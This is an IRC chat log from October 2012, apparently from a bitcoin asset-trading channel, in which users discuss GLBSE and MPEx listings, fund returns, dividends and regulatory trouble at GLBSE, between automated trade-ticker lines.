but placing a bidwall? Oct 04 04:13:42 [GLBSE] [GIGAMINING] 12 @ 0.56558994 = 6.7871 BTC [-] Oct 04 04:13:49 :( Oct 04 04:14:05 rdponticelli: it's the way nefario has us do it Oct 04 04:14:05 !ticker mpoe.etf Oct 04 04:14:08 [GLBSE:MPOE.ETF] [Bid: 1.25039733] [Ask: 1.89999999] [Spread: 0.64960266] [Last: 1.25039733] [24hVol: 421.44809262] [7dAvg: 1.11167851] Oct 04 04:14:28 i don't understand. how can it trade at 1.25 if you have wall at 1.26 ?! Oct 04 04:14:53 huh? Oct 04 04:15:14 [GLBSE] [MPOE.ETF] 69 @ 1.25039733 = 86.2774 BTC [-] Oct 04 04:15:18 how the heck ?! Oct 04 04:15:25 The wall is @1.25 Oct 04 04:18:22 this not wall, this trick wall Oct 04 04:21:23 [GLBSE] [MPOE.ETF] 21 @ 1.2638345 = 26.5405 BTC [+] Oct 04 04:22:07 there's the wall Oct 04 04:22:07 There it goes... Oct 04 04:22:21 Was a pleasure Oct 04 04:23:38 it was nice while it lasted :) :( Oct 04 04:24:31 [MPEX] [S.MPOE] 31400 @ 0.00035922 = 11.2795 BTC [-] Oct 04 04:24:33 [MPEX] [S.MPOE] 34776 @ 0.00035919 = 12.4912 BTC [-] Oct 04 04:25:06 so did you have fun with it smickles ? Oct 04 04:25:18 5 months, best fund in btc history by returns, etc Oct 04 04:25:34 By far Oct 04 04:26:16 !pl mpoe.etf .1 Oct 04 04:26:16 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 04 04:26:20 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 1.2638345 BTC. Capital gain: 1.1638345 BTC. Total: 1.18853732 BTC. (1188.5%) Oct 04 04:26:33 that 1188% is definitive i'd guess Oct 04 04:26:40 Well, to be true, I did not follow SS Oct 04 04:26:50 !pl SS .1 Oct 04 04:26:51 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 04 04:26:53 was it .1 ? Oct 04 04:26:53 mircea_popescu: i found it to be quite nice. I liked accounting for it :) Oct 04 04:26:59 SS [1@0.1BTC] paid: 0.59075039 BTC. Last price: 0.0111 BTC. Capital gain: -0.0889 BTC. Total: 0.50185039 BTC. (501.9%) Oct 04 04:27:08 SS? well, !pl won't work for ss Oct 04 04:27:10 hah! 509, not quite up to 4 digit par! Oct 04 04:27:22 o it split huh Oct 04 04:27:27 yeah Oct 04 04:27:29 so whats fair % ? Oct 04 04:27:56 let me see... Oct 04 04:28:21 also, i'm basically just the accountant for SS Oct 04 04:29:00 Mitt loves big bird Oct 04 04:29:00 [GLBSE] [LOTTOMINING] 10 @ 0.25 = 2.5 BTC Oct 04 04:29:46 [GLBSE] [LOTTOMINING] 100 @ 0.25 = 25 BTC Oct 04 04:29:47 [GLBSE] [MPOE.ETF] 25 @ 1.2638345 = 31.5959 BTC [+] Oct 04 04:29:50 http://bitcoinica.com/ such asshattery. Oct 04 04:30:06 I call this free money Oct 04 04:30:12 haha Oct 04 04:30:22 I was the one who bought the pack at of ETF at 1 BTC each Oct 04 04:30:31 few moments later 1.26 sold Oct 04 04:30:49 What I call good transaction. Oct 04 04:30:54 lol Oct 04 04:31:06 You beat me for a little Oct 04 04:31:19 you were going for them too eh? Oct 04 04:31:34 I bought 2 Oct 04 04:31:44 Was what I have at hand Oct 04 04:31:51 *had Oct 04 04:31:58 yeah, I had nothing in hand and was cancelling bids during that time Oct 04 04:32:05 lmao Oct 04 04:32:07 I'm running out of glbse Oct 04 04:32:24 Yea, me too Oct 04 04:32:30 I'm getting good money from everyone running out =/ Oct 04 04:32:35 Cancelled some bids Oct 04 04:32:41 Almost sold some stock Oct 04 04:33:00 Well, I'm not precisely running out Oct 04 04:33:27 But when I got out of a stock, I take out the btc Oct 04 04:33:37 I'm not liquidating Oct 04 04:34:20 Just lowering exposure Oct 04 04:36:24 eh, and I probably have too much exposure Oct 04 04:38:20 Only reason I don't run funds by the way is that would interfere with my personal portfolio and I don't want to keep track to not cross-trade. Oct 04 04:39:07 I'll have to pick up MPEx assets passthroughs Oct 04 04:39:10 [GLBSE] [NASTY] 2 @ 0.49979956 = 0.9996 BTC [+] Oct 04 04:39:15 GLBSE need those Oct 04 04:39:25 hooraa, i just stole my own password. Oct 04 04:39:33 ... ? Oct 04 04:39:37 from self. Oct 04 04:40:07 kakobrekla huh ? Oct 04 04:40:14 i use password manager Oct 04 04:40:22 so i dont know any of my passwords Oct 04 04:40:28 oh... Oct 04 04:40:29 mircea_popescu: based on the last price, ss would be a 75.891883% gain when you include dividend payments Oct 04 04:40:35 now i needed to get one out somehow Oct 04 04:40:41 smickles a, well that's no competition then Oct 04 04:40:47 are you closing SS too? Oct 04 04:40:56 i think sc2m was closed Oct 04 04:41:08 s2cm hasn't closed Oct 04 04:41:13 Great Oct 04 04:41:13 o ? my bad. Oct 04 04:41:22 so i hacked opera magic wand with javascript Oct 04 04:41:48 lol kakobrekla you know who i do this to all the time ? Oct 04 04:41:49 GIRLS! Oct 04 04:41:59 lol Oct 04 04:42:04 So you stole the password to your password manager, not to you Oct 04 04:42:06 and milk Oct 04 04:42:09 what's up with people complaining GLBSE/SEC all the time? Oct 04 04:42:19 BTC-Mining paranoia. Oct 04 04:42:19 SEC was never interested in GLBSE directly Oct 04 04:42:41 People fear the governments... governments fear people... Oct 04 04:43:34 mircea_popescu: no competition? s2cm ate bad debt via pirate and still gives its shareholders a gain. I'd say that's an epic win Oct 04 04:43:42 [GLBSE] [HYDRO.BONDS] 1 @ 1.3322 BTC [+] Oct 04 04:43:43 [GLBSE] [HYDRO.BONDS] 3 @ 1.332191 = 3.9966 BTC [-] Oct 04 04:43:44 [GLBSE] [HYDRO.BONDS] 1 @ 1.33219 BTC [-] Oct 04 04:43:45 [GLBSE] [HYDRO.BONDS] 1 @ 1.33009 BTC [-] Oct 04 04:43:49 Why do you think governments keep doing stuff short-term with poor long-term benefits? Because all those damned politicians are interested in their career and current popularity, not what will be achieved in a few decades. Oct 04 04:44:34 [GLBSE] [LOTTOMINING] 25 @ 0.25 = 6.25 BTC Oct 04 04:44:41 It's an annoying tendency, parties want to do thing bringing them instant recognition Oct 04 04:44:50 smickles i meant ss's <100% is no competition for mpoe.etf's 1188% as "highest return thibng" Oct 04 04:45:09 ah, well, yeah Oct 04 04:45:23 BTC-Mining the same way ppl "invested" you mean ? Oct 04 04:45:39 You should have a trophy Oct 04 04:45:58 he does. Oct 04 04:45:59 [GLBSE] [LOTTOMINING] 350 @ 0.25 = 87.5 BTC Oct 04 04:46:01 it's called smickles. Oct 04 04:46:18 lol Oct 04 04:46:21 wth is lottomining Oct 04 04:46:23 rdponticelli: you know what smickles means, don't you? Oct 04 04:46:26 looks shady Oct 04 04:46:28 "to be really good" Oct 04 04:46:29 BTC-Mining you DO NOT want to know Oct 04 04:46:32 it will hurt. Oct 04 04:46:35 simply because it says lotto Oct 04 04:47:06 .tr smickles Oct 04 04:47:07 mircea_popescu: "smickles" (de to en, translate.google.com) Oct 04 04:47:24 .o ud smickles Oct 04 04:47:28 1) To be really good. 2) As replacement to okay or great. Note: Usually said with half-hearted meaning or sarcasm OR with little or no interest in the subject of the conversation.A type of happy-go-l Oct 04 04:47:32 :D Oct 04 04:47:36 :D Oct 04 04:47:47 smickles: so you also deserve the trophy to humility Oct 04 04:47:56 :) Oct 04 04:48:04 argh... it's awful... Oct 04 04:48:04 and it's a nickname which I gave myself in 1992 Oct 04 04:48:16 But as long as they actually buy the tickets... Oct 04 04:48:21 so rdponticelli, I came up with the term before it had a meaning Oct 04 04:48:34 It's just not really an investment... Oct 04 04:48:34 [GLBSE] [NASTY] 1 @ 0.42110024 BTC [-] Oct 04 04:48:35 [GLBSE] [NASTY] 2 @ 0.42110023 = 0.8422 BTC [-] Oct 04 04:48:36 [GLBSE] [NASTY] 1 @ 0.4211002 BTC [-] Oct 04 04:48:38 [GLBSE] [NASTY] 9 @ 0.42110003 = 3.7899 BTC [-] Oct 04 04:48:39 [GLBSE] [NASTY] 1 @ 0.42110002 BTC [-] Oct 04 04:48:40 [GLBSE] [NASTY] 35 @ 0.421 = 14.735 BTC [-] Oct 04 04:48:41 [GLBSE] [NASTY] 1 @ 0.4002 BTC [-] Oct 04 04:48:41 It's purely gambling... Oct 04 04:48:42 [GLBSE] [NASTY] 1 @ 0.39983965 BTC [-] Oct 04 04:48:42 [GLBSE] [NASTY] 370 @ 0.391 = 144.67 BTC [-] Oct 04 04:48:47 playing the lottery? Oct 04 04:48:53 smickles: Maybe it got the meaning after you ;) Oct 04 04:49:07 BTC-Mining: also, that sort of operation has been deemed illegal, even in the country where they buy the tickets Oct 04 04:49:20 BTC-Mining i told you. Oct 04 04:49:25 Probably is, yes Oct 04 04:49:37 [MPEX] [F.GIGA.ETF] 3263 @ 0.00045475 = 1.4838 BTC [+] Oct 04 04:49:38 I don't know for sure, but probably Oct 04 04:49:38 [MPEX] [F.GIGA.ETF] 300 @ 0.00045475 = 0.1364 BTC [+] Oct 04 04:49:45 Like 99.9% chance Oct 04 04:50:21 we need to hit 13 Oct 04 04:50:30 hasn't it already? Oct 04 04:50:35 ;;ticker Oct 04 04:50:35 Best bid: 12.8903, Best ask: 12.9899, Bid-ask spread: 0.09960, Last trade: 12.89, 24 hour volume: 31354, 24 hour low: 12.7, 24 hour high: 12.99 Oct 04 04:50:38 13 what? Oct 04 04:50:51 oh, it did on bitfloor Oct 04 04:51:04 [GLBSE] [ARS] 215 @ 0.0145 = 3.1175 BTC [-] Oct 04 04:51:05 oh, right, nevermind Oct 04 04:51:11 bitfloor is running again? Oct 04 04:51:23 seems so Oct 04 04:51:32 By the way BitcoinBear, about your thread of what's worth investing in. Oct 04 04:51:42 there is a bit of a wall on gox Oct 04 04:51:42 'bama looks like he's getting ready to rip asshole Oct 04 04:51:43 You took a look at BTC-MINING/BTC-BOND? Oct 04 04:51:47 yeah? Oct 04 04:51:47 Greatest bitcoin frb Oct 04 04:51:53 can see the killer stare Oct 04 04:52:03 [GLBSE] [ARS] 142 @ 0.0144 = 2.0448 BTC [-] Oct 04 04:52:05 hrm, not very hard, should I Oct 04 04:52:07 ? Oct 04 04:52:17 Maybe Oct 04 04:52:27 Also the Kraken one is run by me too. Oct 04 04:52:34 That's gonna hurt my bank account Oct 04 04:53:08 I thought Kraken was somebody else? Oct 04 04:53:19 Oh, wait, you run the pass-through? Oct 04 04:53:30 yeah Oct 04 04:53:50 [GLBSE] [ARS] 150 @ 0.0143 = 2.145 BTC [-] Oct 04 04:53:55 Have you seen the contract on BTC-BOND and the holdings report? Oct 04 04:54:53 [GLBSE] [ARS] 255 @ 0.0142 = 3.621 BTC [-] Oct 04 04:54:57 oh damn, I see why LOTTOMINING is still getting so much people in. Oct 04 04:55:06 It was issued by mc_lovin Oct 04 04:55:19 I hope the thread was made in the gambling section tho... Oct 04 04:55:28 oh jesus it was listed? Oct 04 04:55:35 yeah... Oct 04 04:56:05 asa1024 glbse new standards. Oct 04 04:56:14 GLBSE is really free-for-all... Investment or not... Oct 04 04:56:15 why not just have a trash can on the desk top and you can drag your bit coin wallet to the trash can and empty it?> Oct 04 04:56:16 MUST be a scam Oct 04 04:56:21 onyl lists quality assets that are in clear violation of laws in all countries involved. Oct 04 04:57:03 ack, GLBSE running very slow for me today :( Oct 04 04:57:11 Actually, GLBSE will be split. Assets respecting regulations will be on GLBSE. Oct 04 04:57:20 Other assets will be moved away. Oct 04 04:57:23 I heard Oct 04 04:57:39 moved away as in couponized Oct 04 04:57:42 ? Oct 04 04:57:46 No Oct 04 04:57:49 Those other assets will go to a black market Oct 04 04:58:57 GLBSE will move toward more MPEx like standards, rest will be moved out. Oct 04 04:59:19 Black market might look like the current GLBSE, idk... Oct 04 05:00:14 lol, assets respecting regs will stay on GLBSE? Oct 04 05:00:20 they set up the different colors, but everything is still in pink Oct 04 05:00:21 you don't know the regs in 'merica Oct 04 05:00:59 what real company would list on glbse? Oct 04 05:01:14 No idea. Oct 04 05:01:23 maybe 6 months ago but nothing now Oct 04 05:01:27 glbse is going to die Oct 04 05:01:28 none right now (if they have a lawyer) Oct 04 05:03:22 what countries don't have securities regulations? Oct 04 05:03:51 who is it that is always outbidding me by 1 satoshi? It is obnoxious! Oct 04 05:03:54 smickles, american regulations don't matter much if it's a UK market and regulated as per UK laws... americans on GLBSE would be trading on a foreign market. Oct 04 05:04:27 I'm not sure how it would work exactly. Oct 04 05:05:01 It is especially bad when GLBSE is running slow, going through all those page turns just to move an order up a tiny bit to outbid them >:( Oct 04 05:05:05 But probably involve registering each asset as a free trading one and involve a quite a bit more paperwork from everyone. And GLBSE would act as a broker for those. Oct 04 05:05:26 More than a full fledged stock market. Oct 04 05:05:32 To keep it more realistic. Oct 04 05:05:37 I don't know tho... Oct 04 05:06:47 GLBSE will move toward more MPEx like standards, << this can't hurt anything Oct 04 05:07:10 BitcoinBaltar prolly BTC-Mining Oct 04 05:07:19 he's the only one left buying afawk Oct 04 05:07:21 no, indeed. Oct 04 05:07:52 We still need some kind of "black, free for all markets". No wrong in lack of regulations. Oct 04 05:07:59 afawk? what does that stand for? Oct 04 05:08:04 as far as we know Oct 04 05:08:07 We really need serious exchanges/brokers Oct 04 05:08:10 and mpex is perfectly black in that sense. Oct 04 05:08:32 it's not black in the sense it doesn't allow listing of shit. it's black i nthe sense it really doesn't care who calls himself "government" Oct 04 05:08:40 should be a perfect combo. Oct 04 05:08:50 MP you have a plural knowledgebase? usually it is afaik, right? Oct 04 05:09:08 BitcoinBear well yea. Oct 04 05:09:15 Indeed. Although it's not free for all. Highling requiring for quality assets only. Oct 04 05:09:34 So black market, but not free to everyone to issue anything. Oct 04 05:09:43 [GLBSE] [LOTTOMINING] 25 @ 0.25 = 6.25 BTC Oct 04 05:09:48 BTC-Mining something like that. Oct 04 05:11:22 [GLBSE] [MPOE.ETF] 1 @ 1.2638345 BTC [+] Oct 04 05:12:03 [GLBSE] [ASICMINER] 8 @ 0.11 = 0.88 BTC [+] Oct 04 05:15:00 [GLBSE] [LOTTOMINING] 25 @ 0.25 = 6.25 BTC Oct 04 05:15:07 [MPEX] [S.MPOE] 1300 @ 0.00035925 = 0.467 BTC [+] Oct 04 05:16:37 [GLBSE] [BTC-BOND] 1 @ 0.00989 BTC [+] Oct 04 05:16:55 [GLBSE] [BTC-MINING] 1 @ 0.9718 BTC [+] Oct 04 05:17:02 So, had a look at contract and spreadsheet for BTC-BOND, BitcoinBear? Oct 04 05:17:45 I'm still waiting for the page to load, stupid slow glbse mumble muble mppff Oct 04 05:17:52 ... Oct 04 05:18:01 wow... my pages load faster than that Oct 04 05:18:08 already loaded a few since then Oct 04 05:20:08 [GLBSE] [COGNITIVE] 3 @ 0.5751 = 1.7253 BTC [-] Oct 04 05:24:32 Ok, I admit, I think I just missed BTC-Bond when I was going through all the assets trying to find anything. Looks pretty good. Oct 04 05:25:05 Aye. It doesn't pay much however. Oct 04 05:25:21 But I carry most of the risks. Oct 04 05:25:25 BTC-Mining how actively do you trade the assets? Oct 04 05:25:41 Almost daily, there's trades. Oct 04 05:25:52 not pay much? it is still a better return than my credit card gets from me! Oct 04 05:26:03 Yeah, it's 26% per year. Oct 04 05:26:59 and why is the price below the listed price? just the recent selloff of people leaving glbse? Oct 04 05:27:14 I believe so Oct 04 05:28:25 [GLBSE] [LOTTOMINING] 5 @ 0.25 = 1.25 BTC Oct 04 05:28:26 I started with 1900$ around around April/May for ~400 BTC and then in end June/August, purchased for 5500 for ~ 500 BTC. Oct 04 05:29:43 I those few months, you can see my personal portfolio went from ~900 BTC to ~1500. Oct 04 05:30:14 That's around 2-5% per week depending on the week. Oct 04 05:30:25 I end up trading a lot. Oct 04 05:30:43 what the fuck Oct 04 05:30:46 In the spreadsheet, why is MPOE.ETF listed as a 0 value? just because it has not been traded in a while? Oct 04 05:30:54 youtube fucked up Oct 04 05:31:06 Yeah, price is taken from API Oct 04 05:31:20 Last update was yesterday Oct 04 05:31:31 and there had been no trades in the last 5 days Oct 04 05:32:06 we just saw one a minute ago, so that should update at some point. Oct 04 05:32:58 I have to republish it regularly Oct 04 05:33:12 because the API tool often inserts Errors because GLBSE api times out. Oct 04 05:33:38 Screws up the whole totals and percent when a cell fills with "error" Oct 04 05:33:46 BitcoinBear: mpoe.etf is winding down, you know Oct 04 05:34:04 yeah, made 5 BTC on that Oct 04 05:34:36 [GLBSE] [LOTTOMINING] 50 @ 0.25 = 12.5 BTC Oct 04 05:34:40 oh, I hadn't heard that Oct 04 05:35:09 [GLBSE] [LOTTOMINING] 50 @ 0.25 = 12.5 BTC Oct 04 05:35:14 He was buying back at 1.26 Oct 04 05:35:25 I bought 20 around 1 Oct 04 05:35:26 is it just MPOE.ETF, or also the underlying asset of MPEx? Oct 04 05:35:34 just the etf. Oct 04 05:35:39 just the ETF Oct 04 05:35:58 any reason why? Oct 04 05:36:31 https://pbs.twimg.com/media/A4U7Ec_CMAAeqkk.jpg Oct 04 05:36:33 most are leaving GLBSE Oct 04 05:36:39 or not enough time Oct 04 05:37:23 Especially since they make around 5% of profits from funds/passthrough they manage. Oct 04 05:37:38 You don't earn much Oct 04 05:38:39 Especially if you manage a 500 BTC fund which earn 1-2 % (5-10 BTC weekly), then get 5% of that (0.25 to 0.5 BTC weekly) Oct 04 05:38:49 Which is 2.5$ to 5$ Oct 04 05:38:58 What's the incentive to be there, trading daily? Oct 04 05:39:05 most peoplewere doing it for the fun Oct 04 05:39:09 as the atmosphere turned sour... Oct 04 05:39:17 That's a major problem... Oct 04 05:39:56 not even sure its a problem. this isn;'t the thing should be done "for fun" Oct 04 05:40:06 it's like throwing grenades for fun Oct 04 05:40:18 [MPEX] [F.GIGA.ETF] 537 @ 0.00045475 = 0.2442 BTC [+] Oct 04 05:40:19 [MPEX] [F.GIGA.ETF] 3700 @ 0.00045475 = 1.6826 BTC [+] Oct 04 05:40:49 I mean, you don't manage a fund just for the fun of it... Oct 04 05:41:08 That's what I was referring to as a major problem. Oct 04 05:41:18 right, you could do some invsting on your own for fun, but taking other peoples money to play with is a bad idea Oct 04 05:41:19 a yeah Oct 04 05:42:00 [GLBSE] [SYNERGY] 2 @ 0.12 = 0.24 BTC [+] Oct 04 05:42:20 I did it because there was a market opportunity. and I structured it in a way that the workload was minimal Oct 04 05:43:11 you barely traded did you Oct 04 05:43:52 mostly, i had buys in to catch the dips which went much further than they should've Oct 04 05:44:43 if there were more funds to work with, i would've been able to do it more efficiently Oct 04 05:44:47 I started with 400 BTC (2k USD) for the fun of it. When I found trading profit was good, I placed more and started taking loans at a small rate, putting my portfolio in front of it to protect against loss of lent funds. **** BEGIN LOGGING AT Thu Oct 4 16:00:20 2012 Oct 04 16:00:55 o rg paid divs i see Oct 04 16:01:04 yeah Oct 04 16:01:08 but i forgot to pay some money Oct 04 16:01:11 so in eed to pay extra Oct 04 16:01:13 can i do that Oct 04 16:01:18 sure Oct 04 16:01:24 where's your p&l i forget ? Oct 04 16:01:29 i can just do the same dividend Oct 04 16:01:35 but with the extra div Oct 04 16:01:36 ? Oct 04 16:01:39 er Oct 04 16:01:42 that's terribly explained Oct 04 16:01:50 i can just do a dividend with the missing amount? Oct 04 16:03:31 my p&l is in a leafpad session Oct 04 16:03:31 almost ready to be copy/pasted Oct 04 16:03:31 i wnat to finish the new bitvps site Oct 04 16:03:31 god admn it Oct 04 16:03:43 "At the moment, we don't see the virtual currency market as a good Oct 04 16:03:43 opportunity for our business. " Oct 04 16:03:44 bah Oct 04 16:03:49 pff Oct 04 16:03:54 who said that? Oct 04 16:03:57 rg : withhold it Oct 04 16:04:03 and pay it aliong with next month div Oct 04 16:04:08 no i dont wnna do that Oct 04 16:04:09 that's gay Oct 04 16:04:14 rg i was trying to get some sports bookies into btc Oct 04 16:04:21 rg it's how it's done man. Oct 04 16:04:35 you say this is owed, we paid this much, paying rest next month cause dongs. Oct 04 16:05:19 oh theyre dumb Oct 04 16:05:19 btc gambling is huge Oct 04 16:05:19 and untaxed Oct 04 16:05:19 all they'd have to do is create an anonymous entity Oct 04 16:05:20 and keep it away from their real business Oct 04 16:05:35 can you take 23 BTC out of my account Oct 04 16:05:38 and hold it in your account Oct 04 16:05:41 until its time for next divs? Oct 04 16:11:17 rg i know Oct 04 16:11:20 what can you do Oct 04 16:11:34 rg why wouldd i do that lol. you just don't spend it! Oct 04 16:11:41 it'll be a growth experience :D Oct 04 16:12:22 [MPEX] [S.MPOE] 2088 @ 0.00035759 = 0.7466 BTC [-] Oct 04 16:12:24 [MPEX] [S.MPOE] 37878 @ 0.00035741 = 13.538 BTC [-] Oct 04 16:12:25 [MPEX] [S.MPOE] 15700 @ 0.0003573 = 5.6096 BTC [-] Oct 04 16:12:26 [MPEX] [S.MPOE] 2034 @ 0.00035729 = 0.7267 BTC [-] Oct 04 16:12:46 no Oct 04 16:12:49 ill spend it on shares Oct 04 16:12:58 look how low mpoe is Oct 04 16:13:10 ;;calc 175000 * 0.00035729 Oct 04 16:13:11 62.52575 Oct 04 16:13:22 ;;calc 175000 * 0.00042001 Oct 04 16:13:22 73.50175 Oct 04 16:15:47 [GLBSE] [YABMC] 4 @ 0.07689999 = 0.3076 BTC [-] Oct 04 16:16:06 ya it's been off the high since all this sec talk Oct 04 16:30:36 [GLBSE] [BDK.BND] 200 @ 0.04 = 8 BTC [+] Oct 04 16:31:13 [GLBSE] [NASTY] 1 @ 0.44 BTC [-] Oct 04 16:31:15 [GLBSE] [NASTY] 1 @ 0.43 BTC [-] Oct 04 16:32:11 http://trilema.com/2012/bitpay-and-the-magical-email-confirmation/ sooo bitpay doesn't actually do opt-in Oct 04 16:36:58 [GLBSE] [DMC] 15 @ 0.0666 = 0.999 BTC [-] Oct 04 16:37:51 [MPEX] [S.MPOE] 13400 @ 0.00035729 = 4.7877 BTC [-] Oct 04 16:39:28 [GLBSE] [NASTY] 1 @ 0.44889676 BTC [+] Oct 04 16:42:54 [GLBSE] [FDBF] 1 @ 0.1499 BTC [+] Oct 04 16:44:23 [GLBSE] [OBSI.HRPT] 1 @ 0.01028 BTC [+] Oct 04 16:45:24 [GLBSE] [ASICMINER] 2 @ 0.109 = 0.218 BTC [-] Oct 04 16:49:22 [GLBSE] [YABMC] 2 @ 0.0769 = 0.1538 BTC [+] Oct 04 16:50:24 [GLBSE] [RSM] 9 @ 0.295 = 2.655 BTC [+] Oct 04 17:00:47 [MPEX] [O.BTCUSD.P100T] 9 @ 0.07007253 = 0.6307 BTC [+] Oct 04 17:21:54 https://bitcointalk.org/index.php?topic=115393.0 Oct 04 17:21:58 so have they run off ? Oct 04 17:23:14 who? Nefario and others? Oct 04 17:23:41 yea Oct 04 17:25:50 if you can't trust a guy named nefario, who can you trust? Oct 04 17:25:52 amirite Oct 04 17:26:03 [MPEX] [F.GIGA.ETF] 2900 @ 0.00045475 = 1.3188 BTC [-] Oct 04 17:26:41 bum-tschhh Oct 04 17:38:12 :o Oct 04 17:38:23 first news of th day Oct 04 17:38:36 smickles Oct 04 17:38:40 rg Oct 04 17:38:50 want to do me a favor/ Oct 04 17:38:51 ? Oct 04 17:39:08 If I can, and want to Oct 04 17:39:10 i will Oct 04 17:39:18 can you hold onto 20 BTC for me Oct 04 17:39:19 for a month? Oct 04 17:39:38 just hold onto it? Oct 04 17:39:49 mind if I ask why you can't hold onto it? Oct 04 17:39:53 lol well you can pay me interest if you want Oct 04 17:40:02 its personal Oct 04 17:40:15 its a weird sex thing, you dont want to know Oct 04 17:40:40 alright, lemme gen an addy for you Oct 04 17:41:28 ;;ticker Oct 04 17:41:29 Best bid: 12.92012, Best ask: 12.998, Bid-ask spread: 0.07788, Last trade: 12.998, 24 hour volume: 30051, 24 hour low: 12.7025, 24 hour high: 13.01 Oct 04 17:42:05 if you dont wann Oct 04 17:42:10 i can just ask imsaguy Oct 04 17:42:15 imsaguy is always down to hold onto fnuds Oct 04 17:42:16 funds Oct 04 17:42:25 he's like a pirateat40 who doesn't scam you Oct 04 17:42:31 /was/ Oct 04 17:42:37 I'm a scammer now. Oct 04 17:42:42 me too Oct 04 17:42:45 loldude, < smickles> alright, lemme gen an addy for you Oct 04 17:42:48 im trying to scam smickles right now Oct 04 17:42:52 but hes making it har Oct 04 17:42:52 d Oct 04 17:42:52 sounds good Oct 04 17:42:58 TAKE MY MONEY! Oct 04 17:43:07 im gonna send him 20 btc Oct 04 17:43:10 then tell him i sent him 25 btc Oct 04 17:43:11 next month Oct 04 17:44:08 imsaguy2 give it hiar. Oct 04 17:44:22 mircea_popescu: you pay interest?! Oct 04 17:44:32 depends. am i keeping your principal ? Oct 04 17:44:51 are we making a perpetual annuity? Oct 04 17:44:53 wait Oct 04 17:44:57 i dunno, trying to figure it out :D Oct 04 17:44:59 are you paying interest again mircea?! Oct 04 17:45:04 say yes Oct 04 17:45:05 you fucker Oct 04 17:45:09 well, mpcd.x pays interest, and so do mpoe bonds Oct 04 17:45:18 i dont want that shit Oct 04 17:45:25 im a very simple man mircea Oct 04 17:45:29 actually mpcd would be ideal for mpex companies seeing how it pays on the 1st Oct 04 17:45:29 i liked it the way it was before Oct 04 17:45:30 what's the rate? Oct 04 17:45:42 a 2% b 3% c 9.x%, but cdo so beware. Oct 04 17:45:50 mircea says that he cant figure out how to do interest anymroe Oct 04 17:45:52 so he just stopped Oct 04 17:45:55 and started keeping the % Oct 04 17:46:07 rg lol you tryin to pressure me ? Oct 04 17:46:07 i want my .5 btc/day you arse face Oct 04 17:46:25 mircea_popescu: only for the past 5 months Oct 04 17:46:26 rg srsly, if you had 20 btc in mpcd.A it'd have paid you .4 on the 1st Oct 04 17:46:35 but i dont understand that shit Oct 04 17:46:36 rg: http://bitbin.it/pDKrS7vw Oct 04 17:46:39 and i dont wanna know Oct 04 17:46:43 rg wellllll then Oct 04 17:46:49 i liked it when i didn't have to do anything Oct 04 17:46:52 and it just paid me every day Oct 04 17:46:53 2%/month? Oct 04 17:46:55 and i would be like oo Oct 04 17:46:56 nice Oct 04 17:46:59 https://bitcointalk.org/index.php?topic=114442.msg1244763#msg1244763 Oct 04 17:47:04 in other news, nefario is utterly fucked Oct 04 17:47:16 i'd very much want to hear what maged has to say now to turn it into a "misunderstanding" Oct 04 17:47:39 puhleaze Oct 04 17:48:04 [GLBSE] [GIGAMINING] 14 @ 0.56509999 = 7.9114 BTC [-] Oct 04 17:48:06 [GLBSE] [GIGAMINING] 3 @ 0.5651 = 1.6953 BTC [+] Oct 04 17:48:07 [GLBSE] [GIGAMINING] 3 @ 0.56515 = 1.6955 BTC [+] Oct 04 17:48:08 [GLBSE] [BDK.BND] 1 @ 0.04949999 BTC [+] Oct 04 17:48:15 [GLBSE] [YABMC] 3 @ 0.0769 = 0.2307 BTC [+] Oct 04 17:48:16 i bet nefario would pay me interest... Oct 04 17:48:32 in lottery tickets Oct 04 17:49:08 this is a bait and switch, i swear Oct 04 17:49:36 [GLBSE] [ASICMINER] 6 @ 0.109499 = 0.657 BTC [+] Oct 04 17:49:38 [GLBSE] [ASICMINER] 94 @ 0.1096 = 10.3024 BTC [+] Oct 04 17:49:48 that's why I wanted nefario to stop trying to regulate that shit Oct 04 17:49:55 ;;rate rg -1 uses dirty sales tactics Oct 04 17:50:01 he'd have some sort of "safe harbor"-like argument to make if he just insisted on being completely hands-off Oct 04 17:50:21 but if he touches some of the issues and not others, he's sort of tacitly condoning the ones he lets through Oct 04 17:50:22 safe harbor in securities exchange? Oct 04 17:50:30 well, I'm not saying it'd be legally viable Oct 04 17:50:38 but he could make that argument informally at least Oct 04 17:50:48 ah, just for consistency, you argue Oct 04 17:50:48 safe harbor doesn't apply if the creation itself is illegal Oct 04 17:50:48 smickles: he has no requirement to regulate it Oct 04 17:50:53 yeah Oct 04 17:51:08 he chose to selectively regulate it Oct 04 17:51:18 and now people are holding the occurrences where he didn't step in against him Oct 04 17:51:28 which is precisely the kind of things safe harbor laws protect against Oct 04 17:51:37 I'm not saying it does apply, just that it's analogous Oct 04 17:51:47 [MPEX] [F.GIGA.ETF] 415 @ 0.00045476 = 0.1887 BTC [+] Oct 04 17:51:48 [MPEX] [F.GIGA.ETF] 1000 @ 0.00045476 = 0.4548 BTC [+] Oct 04 17:51:49 [MPEX] [F.GIGA.ETF] 2800 @ 0.00045476 = 1.2733 BTC [+] Oct 04 17:51:50 [MPEX] [F.GIGA.ETF] 1885 @ 0.00045476 = 0.8572 BTC [+] Oct 04 17:51:50 and he could make the argument on the forum if he'd kept his paws out of it Oct 04 17:51:51 [MPEX] [S.MPOE] 20231 @ 0.00035729 = 7.2283 BTC [-] Oct 04 17:52:31 IANAL but I engage in it regularly with mircea_popescu Oct 04 17:52:57 Who's the 'intern'? Oct 04 17:53:12 copumpkin: is there any legal pitfalls in calling yourself an arbitor or mediator Oct 04 17:53:20 smickles: buttsex Oct 04 17:53:39 that's more of a spike trap, copumpkin Oct 04 17:54:06 I don't think it's really possible to make any legal calls here :) your guesses would be more educated if you were a lawyer Oct 04 17:54:10 but IANAL Oct 04 17:54:31 everytime i see that acronym i think of anal Oct 04 17:54:38 i know it's about lawyers Oct 04 17:54:40 hence my mentions of mircea_popescu and buttsex Oct 04 17:54:43 but i think anal Oct 04 17:56:24 We were not meant to experience life through a machine Oct 04 18:04:45 rg: why doesn't running bitcoin-qt thru a socks proxy to my vps work very well? Oct 04 18:10:18 hmm Oct 04 18:10:26 what kinda socks proxy Oct 04 18:10:32 ssh -DN Oct 04 18:10:36 oh hmm Oct 04 18:10:39 i was just going to suggest using that Oct 04 18:10:42 instead of whatever you're doing Oct 04 18:10:48 umm what exactly do you mean by Oct 04 18:10:51 'doesnt work very well' Oct 04 18:11:00 mind you, you wont be able to accept connections on it Oct 04 18:11:04 so your connection count will be low Oct 04 